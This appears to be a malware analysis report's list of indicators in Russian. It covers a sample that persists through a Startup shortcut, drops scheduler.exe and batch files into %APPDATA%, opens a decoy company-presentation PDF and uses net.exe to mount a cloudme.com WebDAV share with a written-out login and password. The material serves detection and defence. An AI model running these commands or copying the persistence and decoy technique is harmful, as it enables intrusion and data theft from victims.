Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\Scheduler.lnk
- '%APPDATA%\Scheduler\scheduler.exe' execmd run.bat
- '<SYSTEM32>\net.exe' use https://webdav.cloudme.com/strn192312 "cnslditrhc8747edhDs" /user:strn192312 /persistent:no
- '<SYSTEM32>\net.exe' use \\webdav.cloudme.com@SSL\strn192312 /DELETE /Y
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Scheduler\Презентация Компании La Reina style .pdf
- '<SYSTEM32>\cmd.exe' /c run.bat
- %APPDATA%\Scheduler\host.dll
- %APPDATA%\Scheduler\run.bat
- %APPDATA%\Scheduler\scheduler.bat
- %APPDATA%\Scheduler\7z.dll
- %APPDATA%\Scheduler\scheduler.exe
- %APPDATA%\Scheduler\syspack.exe
- %APPDATA%\Scheduler\Презентация Компании La Reina style .pdf
- 'we####.cloudme.com@ssl':139
- 'we####.cloudme.com@ssl':80
- 'we####.cloudme.com@ssl':445
- DNS ASK we####.cloudme.com@SSL
- ClassName: 'EDIT' WindowName: ''